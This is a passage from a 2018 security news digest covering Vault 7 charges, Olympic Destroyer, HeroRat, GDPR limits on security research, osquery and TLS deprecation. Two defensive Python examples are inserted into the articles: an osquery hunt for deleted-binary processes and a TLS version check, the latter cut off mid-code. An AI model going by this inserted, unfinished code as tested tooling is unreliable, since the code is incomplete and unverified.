Regardless of that data, it is foolish for criminals to assume they need not be worried about getting found out if they deal in cryptocurrency crimes. Instances exist of investigators being able to track the IP addresses of cryptocurrency criminals due to those individuals’ carelessness.

Also, a research team discovered there were cases where it was possible to link cryptocurrency transactions with single IP addresses. Through their work, they connected more than 1,000 IP addresses and Bitcoin accounts.

Law Enforcement Agencies Meet the Challenge
The increase in cryptocurrency crime has made police forces around the world realize they cannot afford to let the criminals within the industry remain unchecked. In Europe, an annual conference brings law enforcement personnel and cryptocurrency experts together for a meeting of the minds.

The 2017 gathering attracted over 150 people from around the world. The topics covered included the illegal uses of cryptocurrency, plus legitimate ways to rely on cryptocurrency to reduce crime.

Crime investigators are also using special software that screens cryptocurrency transactions for potential links to things like the black market, theft or drugs. Organizations ranging from the Internal Revenue Service (IRS) to the Drug Enforcement Administration (DEA) are reportedly among the software manufacturers’ clients.

Cryptocurrency

Spurring the Evolution of Crime-Solving Techniques
There’s no doubt about the connection between increases in crime and cryptocurrency. The virtual currency makes criminals attempt new offenses facilitated by aspects of the industry at large, such as cryptocurrency mining. The lack of understanding some consumers have about cryptocurrencies only makes them easier targets.

At the same time, law enforcement agencies are stepping up and developing new methods to get to the bottom of crimes and those who commit them.

So, means of fighting crime get updated, and criminals find out their deeds may not stay hidden forever.


Ex-CIA employee Joshua Adam Schulte charged with leaking Vault 7 dumps
20.6.2018 securityaffairs Hacking

An ex-CIA employee, Joshua Adam Schulte (29), has been charged with stealing classified national defense information and sharing the Vault 7 dumps with WikiLeaks.
Yesterday, the Department of Justice announced that Schulte had been charged in a 13-count indictment.

In mid-May, both The New York Times and The Washington Post revealed the name of the alleged source of the Vault 7 leak, the man who passed the secret documents to WikiLeaks. According to his LinkedIn profile, Schulte worked for the NSA for five months in 2010 as a systems engineer; he then joined the CIA as a software engineer and left the agency in November 2016.

Schulte was identified a few days after WikiLeaks started leaking the precious dumps.

Schulte was arrested for possession of child pornography and, in August 2017, was charged on three counts of receipt, possession and transportation of child pornography.

The man was released in September 2017, but in December he was arrested again for violating the conditions of his release.

“SCHULTE, 29, of New York, New York, is charged with one count each of (i) illegal gathering of national defense information, (ii) illegal transmission of lawfully possessed national defense information, (iii) illegal transmission of unlawfully possessed national defense information, (iv) unauthorized access to a computer to obtain classified information, (v) theft of Government property, (vi) unauthorized access of a computer to obtain information from a Department or Agency of the United States, (vii) causing transmission of a harmful computer program, information, code, or command, (viii) making material false statements to representatives of the FBI, (ix) obstruction of justice, (x) receipt of child pornography, (xi) possession of child pornography, (xii) transportation of child pornography, and (xiii) copyright infringement.” reads the press release published by the DoJ.

According to the DoJ, Schulte used his access to CIA’s networks while working for the intelligence agency.

“Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Vault 7 dumps

Schulte has always denied any involvement in the Vault 7 data leak; he believes the authorities suspected him because he had left the CIA a few months before the leak began.


'Olympic Destroyer' Malware Spotted in New Attacks
19.6.2018 securityweek Virus

Olympic Destroyer, the malware involved in a campaign targeting this year’s Olympic Winter Games in Pyeongchang, South Korea, has been used recently in attacks aimed at organizations in Germany, France, the Netherlands, Russia, Switzerland and Ukraine.

Olympic Destroyer is designed to wipe files and make systems inoperable, and steal passwords from browsers and Windows. The malware was used during the Olympics in an attack that disrupted IT systems, including the official event website, display monitors, and Wi-Fi connections.

Researchers noted after the attack that the hackers behind the operation planted sophisticated false flags inside Olympic Destroyer. Various clues suggested that the campaign could have been the work of North Korea, Russia or China.

Kaspersky Lab spotted new attacks involving Olympic Destroyer in May and June, and the list of targets raises even more questions about the threat actor’s goals and motives.

The latest attacks targeted financial companies in Russia and European organizations focusing on protection against chemical and biological threats, including in Germany, France, the Netherlands, Switzerland and Ukraine.

The malware was delivered using spear-phishing emails carrying malicious documents. Many of the decoy documents referenced bio-chemical threat research, and some of the text was written in perfect Russian, which suggests that a native speaker helped write it.

The attack also involved PowerShell scripts and PowerShell Empire, an open-source framework that allows fileless control of the compromised machine. The malware was hosted and controlled using hacked web servers running vulnerable versions of the Joomla content management system.

The fact that financial organizations were also targeted could mean one of several things. It’s possible that the Olympic Destroyer malware is used by multiple threat groups, including one that is financially motivated. It could also be a result of cyberattack outsourcing, which researchers claim is not uncommon for nation state actors, or the financial-focused attacks could be part of another false flag operation. In any case, the new attacks involving Olympic Destroyer are significant.

“It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits,” Kaspersky researchers warned.


Ex-CIA Employee Charged With Leaking Agency's Hacking Tools
19.6.2018 securityweek BigBrothers

A former employee of the U.S. Central Intelligence Agency (CIA) has been charged with stealing classified national defense information from the agency and sharing it with WikiLeaks.

The Department of Justice announced on Monday that Joshua Adam Schulte, 29, of New York, New York, had been charged in a 13-count indictment. The indictment does not specifically name WikiLeaks, but the media revealed last month that authorities had been preparing to charge Schulte for providing WikiLeaks the CIA hacking tools that were published by the whistleblower organization as part of its Vault 7 leak.

Schulte worked for the NSA for five months in 2010 as a systems engineer. He then joined the CIA, where he worked as a software engineer until November 2016, when he moved to New York City and started working as a software engineer for Bloomberg.

The man reportedly became the main suspect for the Vault 7 leaks one week after WikiLeaks started releasing files. However, when investigators searched his apartment and devices, they uncovered a file sharing server hosting child pornography.

Schulte was charged on three counts of receipt, possession and transportation of child pornography in August 2017 and was released the following month. He was arrested again in December for violating the conditions of his release and he has been in custody ever since.

Schulte has now been charged with illegal gathering of national defense information; illegal transmission of lawfully possessed national defense information; illegal transmission of unlawfully possessed national defense information; unauthorized access to a computer to obtain classified information; theft of Government property; unauthorized access of a computer to obtain information from a Department or Agency of the United States; and causing transmission of a harmful computer program, information, code, or command.

The list of charges also includes making material false statements to representatives of the FBI; obstruction of justice; receipt of child pornography; possession of child pornography; transportation of child pornography; and copyright infringement. If convicted, the man could spend decades behind bars.

The hacking-related charges involve Schulte’s activities inside the CIA’s networks while being employed by the agency.

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Schulte previously pleaded not guilty to the child pornography-related charges, claiming that up to 100 people had access to the server storing illegal content. Investigators, on the other hand, claim they have proof Schulte had been aware of the presence of the files.

As for leaking CIA hacking tools, Schulte told the press last month that the FBI likely suspected him due to the fact that he had left the CIA on poor terms just months before the Vault 7 leak started.


Inside the Legislative and Regulatory Minefield Confronting Cybersecurity Researchers
19.6.2018 securityweek Privacy

Legislation – especially complex legislation – often comes with unintended consequences. The EU’s General Data Protection Regulation (GDPR), which came into force May 25, 2018, is an example of complex legislation.

GDPR, and other cybersecurity laws, are designed to protect privacy and property in the cyber domain. There is, however, concern that many of these laws have a common unintended consequence: in protecting people from cybercriminals, the laws also protect cybercriminals from security researchers.

The question is whether security research is an unintended but inevitable collateral damage of cybersecurity legislation. While focusing on GDPR, this examination will also consider other legislation, such as the CLOUD Act, the Computer Fraud and Abuse Act (CFAA) and the Computer Misuse Act (CMA).

The WHOIS issue

One immediate example involves GDPR, the Internet Corporation for Assigned Names and Numbers (ICANN) and the WHOIS database/protocol. ICANN maintains a global database of internet domain registrations that has been readily available to security vendors and security researchers.

Researchers with one known malicious domain have been able to cross-reference details via WHOIS to locate, at speed, potentially thousands of other malicious domains registered at the same time or by the same person or with the same contact details.

However, registrant details of EU residents are now protected data under GDPR. ICANN can no longer share that data with third parties – effectively meaning that researchers can no longer access WHOIS data to discover potentially malicious domains and protect the public from spam or phishing campaigns involving those domains.

“Many critical cybersecurity activities,” explains Sanjay Kalra, co-founder and chief product officer at Lacework, “like spam mitigation and botnet takedowns, depend on publicly-available records to identify those responsible for cyber-attacks, botnets, or spam email campaigns. The Internet’s domain management system (ICANN) identifies a domain’s owner; and researchers use that information to identify the culprits responsible for some of the Internet’s most damaging attacks.”

In this example of an unintended consequence there is a desire on all sides to solve the problem. ICANN and the European regulators have been discussing the issue for many months; and on 17 May, ICANN adopted a Temporary Specification for gTLD Registration Data.

Cherine Chalaby, chair of the ICANN board of directors, blogged, “The adoption of this Temporary Specification is a major and historic milestone as we work toward identifying a permanent solution. The ICANN org and community have been closely working together to develop this interim model ahead of the GDPR’s 25 May 2018 enforcement deadline, and the Board believes that this is the right path to take.”

This is one unintended consequence that might find a solution. “There is still hope to see a compromise where private data would stay protected while allowing the “good guys” to research and fight cybercrime,” comments ESET security intelligence team lead, Alexis Dorais-Joncas. “Some proposed solutions would allow for example certified 3rd parties such as law enforcement or researchers to access the redacted part of the WHOIS data.”

Laws Impacting Cybersecurity and Research

Nevertheless, the wider issue of unintended consequences on security researchers remains. Can researchers download stolen credentials for analysis; can they probe a potential C&C server and evaluate personal details; can they take over the email accounts of scammers for research purposes?

Laws, Regulations and Researchers
Privacy regulations, including GDPR, generally make some concessions – for example, for national security issues and for law enforcement investigations under certain circumstances. Independent researchers do not fall directly within either category.

Whether or not security research is permitted or denied by GDPR and other regulations is a complex issue with many different interpretations – and SecurityWeek spoke to several researchers for their understanding of the difficulties.

Erka Koivunen, CISO at F-Secure, suggests that potential problems are neither new nor restricted to GDPR. “Security research on stolen datasets has been problematic even under earlier laws,” he said; adding that other regulations such as the EU’s export control regulations and the Wassenaar Arrangement, “are almost hostile to security research and testing.”

He noted, however, that European regulators have not so far been too concerned about the ‘notification’ requirement of existing regulations (except for the telecoms-specific regulation).

His colleague, F-Secure’s principal security consultant Jarosław Kamiński, widens the researchers’ problem from privacy laws (such as GDPR) to property laws (such as CFAA and CMA): “Obtaining data from C2 servers and cache hives may constitute computer break-in if authorization and access control mechanisms were circumvented in the process.”

Immediately, three important issues have been raised: adequate authorization; whether the regulators are strict in interpretation and enforcement; and the effect of other regulations (such as the U.S. Computer Fraud and Abuse Act and the UK’s Computer Misuse Act).

Authorization and other regulations
The ‘authorization’ issue includes a common belief that researchers can ignore regulations if they have been authorized to do so by the FBI. Luis Corrons, security evangelist at Avast, comments, “Researchers cannot legally hack into a potential C&C. The only way to do that is in cooperation with law enforcement.”

Josu Franco, strategy and technology advisor at Panda Security, has a similar viewpoint. “Private individuals or companies,” he told SecurityWeek, “do not have the right to hack back at servers, unless it is done by (or in collaboration with) law enforcement as part of an investigation. So, it would be illegal for a researcher to hack into a server by himself/herself and download its contents.”

Corrons believes this process could be made easier and clearer if governments were to more actively encourage collaboration between public agencies and private researchers.

However, it isn’t clear that the FBI in the U.S. and other agencies elsewhere can authorize otherwise illegal cyber activity. “I do not believe this is ever OK under any law, or at least not in the U.S.,” comments Brian Bartholomew, principal security researcher at Kaspersky Lab. “‘Hacking’ into any system implies unauthorized access, which is illegal under the Computer Fraud and Abuse Act.”

He continued, “While there have been proposals to allow network defenders to ‘hack back’ under certain circumstances, such as the Active Cyber Defense Certainty (ACDC) Act, none have been enacted into law and they have raised significant concerns among various stakeholders in the cyber ecosystem. In my opinion, the legal implications of such an approach alone make such proposals problematic all around.”

Scott Petry, CEO and co-founder of Authentic8, has a similar view. “I’m not aware of instances where a government agency has legitimized hacking activity,” he said. “The FBI would not have jurisdiction in non-US regions, so the EU agencies would no more honor the FBI’s approval of the activity than U.S. law enforcement would do if Interpol or another EU agency legitimized an attack against US resources. So, I don’t think there’s a free pass that either organization can offer to parties in the other region.”

The recent CLOUD Act adds a further complication. Technically, this allows the FBI to authorize an otherwise illegal action – indeed, the FBI can insist upon it. The FBI can now demand access to EU PII held by a U.S. company anywhere in the world – which could place that company in contention with GDPR.

Furthermore, some researchers believe that CLOUD will have a chilling effect on future U.S. research. “Given that pen-testing and research require either formal agreements or navigating challenging questions around legal-to-do research, the CLOUD Act is incredibly problematic,” comments Robert Burney, technical instructor at SecureSet. “Legally, a security researcher cannot test cloud infrastructure without breaking laws, and this increases that risk.” He fears that researchers will avoid testing cloud infrastructure at the same time as more and more companies are adopting it.

“This increase in policy and politics,” he suggests, “will prevent high quality research in the United States and reduce our overall security… This is an inherent risk in both the GDPR and CLOUD Act. Security researchers will need to know almost as much about legal policy as they do the computers they research – and this will slow our ability to improve overall security.”

Adam McNeil, senior malware intelligence analyst at Malwarebytes is less concerned. “The Computer Fraud and Abuse Act (U.S.) and the Computer Misuse Act (UK) prohibit unauthorized access to computer systems, but both offer protections for academic and private sector research. Taken together, security researchers have a somewhat clear responsibility: don’t access systems without authorization; and if vulnerabilities are found, submit the information via responsible disclosure practices.”

But still there are problems and difficulties. Joseph Savirimuthu, senior lecturer in law at the Liverpool Law School, points out that there is no formal definition distinguishing the researcher from the hacker. In the UK, “The Computer Misuse Act 1990 and new data breach notification rules do not distinguish between White Hat and Black Hat. Neither does the Fraud Act 2006.”

Interpretation and enforcement of GDPR
In the final analysis, what a law or regulation says is not as important as how the enforcers of the law (law enforcement or official regulators) respond to that law; and ultimately how judges interpret that law. GDPR is a particularly difficult example. Firstly, despite its ‘unifying’ intention, there is a degree of flexibility that allows different EU nations to implement the law according to national preferences.

Secondly, it is still ‘enforced’ by national regulators who may vary in the severity of their interpretation. The UK, for example, is traditionally more business-friendly in its application of privacy laws than some of its European partners – such as France and Germany.

Thirdly, there is inevitably a degree of ambiguity in words that must be translated into multiple languages. For example, when Julian Assange attempted to overturn his Sweden-issued arrest warrant, UK judges chose to use the French language version of the relevant EU law to assert its validity rather than the English language version (it was potentially not valid under a strict interpretation of the English language version of the same European law).

Such vagaries leave it far from clear whether security researchers will be allowed or discouraged to continue their work – and the security researchers themselves have widely different views.

Joel Wallenstrom, CEO at Wickr, is cautiously hopeful. “We don’t anticipate that GDPR will make security research more difficult than it already is for many infosec researchers. GDPR-specific implications aren’t yet clear. Enforcement actions after May 25 will certainly provide signal to the industry on where the EU regulation is steering. Downloading a database to perform forensic analysis does not necessarily translate into becoming a ‘data operator’ or ‘processor’ under GDPR.”

“The notion that legitimate security researchers would be held responsible for GDPR is silly,” comments Kathie Miley, COO of Cybrary. “As long as they are not downloading or processing personal data there is no applicability to GDPR. Also, there is no logical reason a white hat security researcher would need to download or process an EU citizen’s personal data.”

This is not a universal view. Researchers sometimes download stolen PII from the dark web or paste sites for their own analysis. And although it is commonly held that provided researchers treat PII responsibly and in accordance with the principles of GDPR, they will not be held to account, there is no such guarantee within GDPR or other cyber legislation.

Robin Wood (aka DigiNinja) is an independent penetration tester who has done much work on passwords. When asked if GDPR would make him think twice about downloading PII (in the form of stolen and dumped user IDs and passwords), he replied, “I don’t know whether technically it would be a breach to hold the data, but I tend to hold these types of things for fairly short periods then get rid of them. When I publish things, it is always aggregated enough to be anonymized, so the publishing shouldn’t be an issue.”

He doesn’t know the answer to the problem, but does not intend to change his current behavior.

Precedent
A common problem with many laws is that they tend to be abused by law enforcement agencies seeking to find legal justification for a preferred course of action. ‘Overreach’ is a common criticism.

Examples could include the U.S. government’s use of the Stored Communications Act of 1986 to issue a search warrant on Microsoft for data held in Ireland – an action that is now mooted by the passing of the CLOUD Act.

In 2012, one-time self-styled Anonymous spokesperson Barrett Brown was indicted on charges that included posting a link to stolen Stratfor data that was already available on the internet. Around the same time, Jeremy Hammond was being charged with involvement in the actual Stratfor hack, apparently having been urged to do so by the FBI informant Hector Xavier Monsegur (aka Sabu) of the LulzSec hacking crew.

While Hammond eventually pled guilty and received the maximum 10 years of jail time for ‘doing’ the hack, Brown faced 45 years for posting a link to some proceeds from the hack.

However, perhaps the iconic example of overreach accusations involved Aaron Swartz, the co-founder of Reddit. Swartz was accused of breaking into MIT and illegally downloading millions of academic articles from the subscription-only JSTOR. It is claimed he simply felt that these academic articles should be freely available to everyone.

Swartz faced charges of computer fraud, wire fraud and other crimes carrying a maximum sentence of 35 years in prison and a $1 million fine. He committed suicide – and the charges were posthumously dropped.

These are rare occurrences and do not directly relate to security research; but they demonstrate that laws can potentially be misused or used for purposes not originally intended by the lawmakers.

A view from the UK GDPR regulator
Given the scope for confusion over the effect of GDPR on security researchers, SecurityWeek approached the UK Information Commissioner’s Office for comment.

An ICO spokesperson told SecurityWeek: “The ICO recognizes the valuable work undertaken by security researchers. Data protection law neither prevents nor prohibits such activity. As the GDPR states, processing personal data for the purposes of network and information security (and the security of related services) constitutes a legitimate interest of the data controller concerned. Organizations that do this must nevertheless ensure that the processing is essential for these purposes, is proportionate to what they are trying to achieve, and that they follow the GDPR’s requirements.

“Further,” he added, “the Data Protection Bill [the UK-specific law being readied to replace GDPR following Brexit] also includes a specific defense relating to the re-identification of de-identified personal data; e.g. where a security researcher may seek to test the effectiveness of the de-identification process.”

(It is worth noting that there is no guarantee that the UK’s GDPR replacement will be considered ‘adequate’ by the EU post-Brexit. This could introduce further complications for UK researchers. The same activity could be considered legal by the ICO, but illegal by, for example, the French CNIL regulator.)

The GDPR statement on the legitimate interest of security researchers is found in recital 49. In full, it states:

“The processing of personal data to the extent strictly necessary and proportionate for the purposes of ensuring network and information security, i.e. the ability of a network or an information system to resist, at a given level of confidence, accidental events or unlawful or malicious actions that compromise the availability, authenticity, integrity and confidentiality of stored or transmitted personal data, and the security of the related services offered by, or accessible via, those networks and systems, by public authorities, by computer emergency response teams (CERTs), computer security incident response teams (CSIRTs), by providers of electronic communications networks and services and by providers of security technologies and services, constitutes a legitimate interest of the data controller concerned.”

Noticeably, it does not state that ‘security research’ is allowed – only that some forms of research strictly limited to what is ‘necessary and proportionate’ can be defined as a ‘legitimate interest’.

Summary
Cyber laws are good faith attempts by lawmakers to protect the privacy and computer-related property of internet users. The difficulty with all laws is that once they are enacted, interpretive control passes to the law enforcers and judiciary.

Different jurisdictions may treat the same law differently, while different judges may interpret the letter of the law differently.

The UK ICO has made it clear that it does not believe that genuine research is precluded by the GDPR – indeed, recital 49 specifically allows it. Nevertheless, even the allowance of security research hinges on the value judgment of what is meant by ‘strictly necessary and proportionate for the purposes of ensuring network and information security’.

It is likely that security researchers who treat personal data in the way companies are required to treat personal data, and who delete it after use, will not be treated as in breach of GDPR.

“Researchers need to have a legitimate reason to have to work with the data,” explains Michael Aminzade, VP global compliance and risk service at Trustwave. “If they have reason because they are looking into the impacts of a breach then for the time of the research they will be OK to work with this data, but they need to work with it within the bounds of the regulations. Once the research is finished this data can’t be kept ‘in case’ of future research, as there is no legitimate need at that point – so the data should be deleted within the requirements of the regulation.”

However, where research requires breaking into and analyzing data found on a suspected criminal C&C server, the researcher is on less solid ground. The consensus among security firms is that this should only ever be done in conjunction with, for, or on behalf of, law enforcement in an ongoing investigation. However, it is unlikely that law enforcement approval has any actual weight in law.

The reality is that all forms of active security research must tread a very fine line between legal and illegal activity – and ultimately it will be up to the courts to decide on the legality or illegality of any specific regulator-challenged research.


HeroRat Controls Infected Android Devices via Telegram
19.6.2018 securityweek Android Virus

A newly detailed Android remote access Trojan (RAT) is leveraging Telegram’s bot functionality to control infected devices, ESET reveals.

Dubbed HeroRat, the malware has been spreading since at least August 2017. As of March 2018, the Trojan’s source code has been available for free on Telegram hacking channels, resulting in hundreds of variants emerging in attacks.

Although the source code is available for free, one of these variants is being sold on a dedicated Telegram channel at three price points, depending on functionality. A support video channel is also available, the security company has discovered.

“It is unclear whether this variant was created from the leaked source code, or if it is the ‘original’ whose source code was leaked,” ESET’s Lukas Stefanko notes in a blog post.

HeroRat differs from other Telegram-abusing Android RATs in that it has been developed from scratch in C#, using the Xamarin framework, Stefanko says. This is a rare combination for Android malware, as previously analyzed Trojans were written in standard Android Java.

Moreover, the malware author has adapted the Telegram protocol to the used programming language. Instead of using the Telegram Bot API as other RATs, the new threat uses Telesharp, a library for creating Telegram bots with C#. All communication to and from the infected devices is performed using the Telegram protocol.

The new malware is being distributed via third-party app stores, social media, and messaging apps, in various appealing guises (apps promising free Bitcoins, free Internet, and more followers on social media), mostly in Iran.

The malicious program is compatible with all Android versions, but it requires users to grant it a broad range of permissions, sometimes even activating its app as device administrator. Based on these permissions, the threat can then erase all data on the device, lock the screen, change passwords, and change password rules.

After the installation has been completed and the malware is launched, a popup appears (in either English or Persian), claiming that the app can’t run and that it is being uninstalled. The victim is then informed the uninstallation has been completed, and the app icon disappears.

The malware, however, continues to run in the background, and the attacker can start using Telegram’s bot functionality to control the newly infected device. A bot operated via the Telegram app controls each compromised device, Stefanko says.

HeroRat can spy on victims and exfiltrate files from the infected devices. It can intercept text messages, steal contacts, send text messages, and make calls, record audio and screen, obtain device location, and control the device’s settings.

These capabilities are accessible through clickable buttons in the Telegram bot interface, making it very easy for attackers to control victimized devices.

The malware author has put up for sale bronze, silver, and gold panels, offered at $25, $50, and $100, respectively. The malware’s source code, on the other hand, is available at $650, offered by HeroRat’s (ambitious) author themselves.

“With the malware’s source code recently made available for free, new mutations could be developed and deployed anywhere in the world,” Stefanko notes.

“To avoid falling victim to Android malware, stick to the official Google Play store when downloading apps, make sure to read user reviews before downloading anything to your device and pay attention to what permissions you grant to apps both before and after installation,” the researcher concludes.


Osquery Management Firm Uptycs Emerges from Stealth With $10 Million Funding
19.6.2018 securityweek IT

Waltham, Mass-based Uptycs has emerged from stealth today with the announcement of $10 million Series A funding. The investment was led by ForgePoint Capital and Comcast Ventures.

Uptycs provides security analytics to the huge amounts of data that can be provided by the Osquery open source endpoint agent. The new funds will be used to expand staff levels and further product development.

Osquery is an operating system instrumentation framework for Windows, OS X, Linux and FreeBSD developed by Facebook. It effectively turns the operating system of individual endpoints into a relational database, allowing system data, such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes, to be explored via SQL queries.

This has huge potential for security. For example, a query could be used to return all currently executing processes, but refined to list only those where the original launching binary no longer exists on the filesystem. This could indicate stealthy malware.
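The hunt described above, as an added example that is not code from Uptycs or the osquery project: the osquery SQL query for running processes whose launching binary is gone from disk (joined with their open sockets for context), plus a triage step over the rows `osqueryi --json` returns. The sample rows are constructed; the table and column names (`processes.on_disk`, `process_open_sockets`) are real osquery schema.

```python
"""Added example (not code from Uptycs or the osquery project): the hunt
described above, running processes whose launching binary no longer exists on
disk, as an osquery SQL query plus a triage step over `osqueryi --json` rows."""
import json
import shutil
import subprocess
from typing import Dict, List

# Real osquery tables and columns: processes.on_disk is 1 when the launching
# binary still exists, 0 when it has been deleted and -1 when unknown.
# The LEFT JOIN adds any open sockets so a finding carries network context.
DELETED_BINARY_QUERY = """
SELECT p.pid, p.name, p.path, p.parent,
       s.remote_address, s.remote_port
FROM processes AS p
LEFT JOIN process_open_sockets AS s ON s.pid = p.pid
WHERE p.on_disk = 0;
""".strip()


def run_osquery(sql: str) -> List[Dict[str, str]]:
    """Run a query through the local osqueryi binary and return its rows.
    osqueryi --json emits one object per row with every value as a string."""
    exe = shutil.which("osqueryi")
    if exe is None:
        raise RuntimeError("osqueryi is not installed or not on PATH")
    proc = subprocess.run([exe, "--json", sql], capture_output=True,
                          text=True, check=True)
    return json.loads(proc.stdout)


def triage(rows: List[Dict[str, str]]) -> Dict[int, dict]:
    """Collapse the joined rows into one finding per pid.

    A process with several sockets yields several rows; a process with none
    yields a single row whose socket columns are empty (LEFT JOIN). That row
    must still be reported: a deleted-binary process with no network activity
    yet is exactly the stealthy case the text describes."""
    findings: Dict[int, dict] = {}
    for row in rows:
        pid = int(row["pid"])
        finding = findings.setdefault(pid, {
            "name": row["name"],
            "path": row["path"],
            "parent": int(row["parent"]),
            "remotes": set(),
        })
        if row.get("remote_address"):
            finding["remotes"].add(f"{row['remote_address']}:{row['remote_port']}")
    return findings


# Constructed sample rows, shaped like osqueryi --json output for the query
# above (all values strings; socket columns empty when the join found nothing).
SAMPLE_ROWS = [
    {"pid": "4242", "name": "svchost", "path": "/tmp/.x/svchost", "parent": "1",
     "remote_address": "203.0.113.7", "remote_port": "443"},
    {"pid": "4242", "name": "svchost", "path": "/tmp/.x/svchost", "parent": "1",
     "remote_address": "203.0.113.9", "remote_port": "8080"},
    {"pid": "5150", "name": "updater", "path": "/dev/shm/updater", "parent": "4242",
     "remote_address": "", "remote_port": ""},
]

if __name__ == "__main__":
    try:
        rows = run_osquery(DELETED_BINARY_QUERY)  # live host, if osqueryi exists
    except RuntimeError:
        rows = SAMPLE_ROWS  # otherwise fall back to the constructed sample
    for pid, f in sorted(triage(rows).items()):
        remotes = ", ".join(sorted(f["remotes"])) or "no open sockets"
        print(f"pid {pid} ({f['name']}, parent {f['parent']}): "
              f"binary {f['path']} missing from disk; {remotes}")
```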


"By itself," explained Uptycs director of security in a blog posted last week, "Osquery is a really neat project that allows you to virtualize an endpoint as if it were a SQL database of information, instead of having to run and remember hundreds of different system utilities. You can ask questions with queries, and schedule questions with query packs. However, what you really need is a way to deploy and manage Osquery at scale."

This is Uptycs. The Uptycs security analytics platform, said the firm in a statement today, stores and transforms Osquery telemetry into context-rich dashboards, reports and alerts that help teams detect intrusions, discover vulnerabilities and manage compliance all from a comprehensive, common dataset. And it doesn't matter whether it is 50 or 50,000 endpoints involved.

"Organizations aren't Windows-centric anymore. There is an increasing mix of Windows, Linux, Mac and containers running across the enterprise, especially in cloud and hybrid environments," said Uptycs CEO and founder, Ganesh Pai. "Security solutions have not kept pace to serve the needs of today's modern computing environments. There are growing blind spots especially for cloud workloads and macOS that Osquery is uniquely capable of covering. Uptycs is helping companies leverage the benefits of Osquery quickly, and at scale."

"A challenge in the modern enterprise is juggling the numerous point security solutions -- each with their own data collection strategy -- especially across a diverse ecosystem of IT assets. Uptycs combines the universality of Osquery with meaningful views of data," explained Andy Ellis, CSO at Akamai. "A team of any size or maturity benefits, taking action across a range of needs from compliance to incident response. As organizations grow, they will continue to benefit from the continuous monitoring and analytics Uptycs provides."


Data Stolen in OPM Breach Used in Loan Fraud Scheme
19.6.2018 securityweek Incident

Two individuals pleaded guilty recently over their role in a scheme that involved fraudulent loans obtained using personal information stolen in the massive breach at the U.S. Office of Personnel Management (OPM).

A Maryland woman, Karvia Cross, pleaded guilty on Monday and a co-defendant, Marlon McKnight, admitted being involved in the scheme on June 11. The two pleaded guilty to conspiracy to commit bank fraud and aggravated identity theft. Cross will be sentenced on October 26.

According to authorities, the fraudsters used personal information stolen from the OPM to obtain personal and vehicle loans through the Langley Federal Credit Union (LFCU).

In 2015 and 2016, the financial organization received many online membership and loan applications using identity data compromised in the OPM breach, and the requests were approved prior to LFCU learning that they had been sought using stolen identities.

The fraudsters then withdrew the fraudulently obtained proceeds from the LFCU accounts they had opened.

It’s unclear how the fraudsters obtained the data stolen in the OPM breach. U.S. authorities have blamed Chinese hackers for the attack and last year the FBI even arrested a Chinese national suspected of being involved in the development of the Sakura exploit kit, which was allegedly used in the campaign.

Described as one of the largest breaches of government data in U.S. history, the OPM incident occurred in 2014 and 2015, and it resulted in the theft of personal information from the background checks of roughly 22 million people.


Deprecating TLS 1.0 and TLS 1.1 … kill them now!
19.6.2018 securityaffairs Safety

If approved, the Internet-Draft formally deprecates Transport Layer Security versions 1.0 (TLS 1.0) [RFC2246] and 1.1 (TLS 1.1) [RFC4346].
In March, the Internet Engineering Task Force (IETF) finally announced the approval of TLS 1.3, the new version of the Transport Layer Security traffic encryption protocol.

It was a long journey: the IETF had been analyzing proposals for TLS 1.3 since April 2014, and the final release is the result of work on 28 drafts.

The TLS protocol was designed to allow client/server applications to communicate over the Internet in a secure way preventing message forgery, eavesdropping, and tampering.

TLS 1.2 and TLS 1.3 are quite different: the new version introduces many major features to improve performance and to make the protocol more resilient to certain attacks, such as the ROBOT technique.

Surprisingly, both TLS 1.0 and TLS 1.1 are still in use online; in many cases the migration of applications is still waiting for management to commit to it, which exposes users to serious risks.

Some experts argue the best way to make the Internet more secure is to ban application fallback to both TLS 1.0 and 1.1 standards.

The PCI Council’s deprecation deadline of June 30, 2018, is upon us and the Internet-Draft urges the deprecation of insecure protocols.

Support for TLS 1.0 has been removed, or will be by July 2018, from several standards, products, and services, including 3GPP 5G, Cloudflare, Amazon Elastic Load Balancing, and GitHub.

The Draft also highlights that supporting older versions requires additional effort for library and product maintenance.

“This document [if approved] formally deprecates Transport Layer Security (TLS) versions 1.0 [RFC2246] and 1.1 [RFC4346] and moves these documents to the historic state. These versions lack support for current and recommended cipher suites, and various government and industry profiles of applications using TLS now mandate avoiding these old TLS versions.” reads the Draft.


“Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,01}. Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,01}.” continues the draft. “Any party receiving a Hello message with the protocol version set to {03,01} MUST respond with a ‘protocol_version’ alert message and close the connection.”
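The rule quoted above from the server's side, as an added example that is not part of the draft or this article: a Python `ssl` server context that never negotiates below TLS 1.2, and an inspector that reads `ClientHello.client_version` from raw record bytes and produces the fatal `protocol_version` alert the draft requires. It applies the same check to {03,02} (TLS 1.1), which the draft deprecates alongside TLS 1.0; the minimal ClientHello builder is a constructed test input, not a real client.

```python
"""Added example (not from the draft or the article): refusing deprecated TLS
versions on the server side, both via the ssl module and by inspecting the
ClientHello.client_version field the draft's MUST NOT refers to."""
import os
import ssl
from typing import Optional, Tuple

# TLS record/alert constants from the TLS RFCs: content types, the fatal alert
# level and the protocol_version alert description (70).
HANDSHAKE_CONTENT_TYPE = 0x16
ALERT_CONTENT_TYPE = 0x15
CLIENT_HELLO = 0x01
ALERT_FATAL = 0x02
ALERT_PROTOCOL_VERSION = 0x46

# {03,01} = TLS 1.0 and {03,02} = TLS 1.1: both deprecated by the draft.
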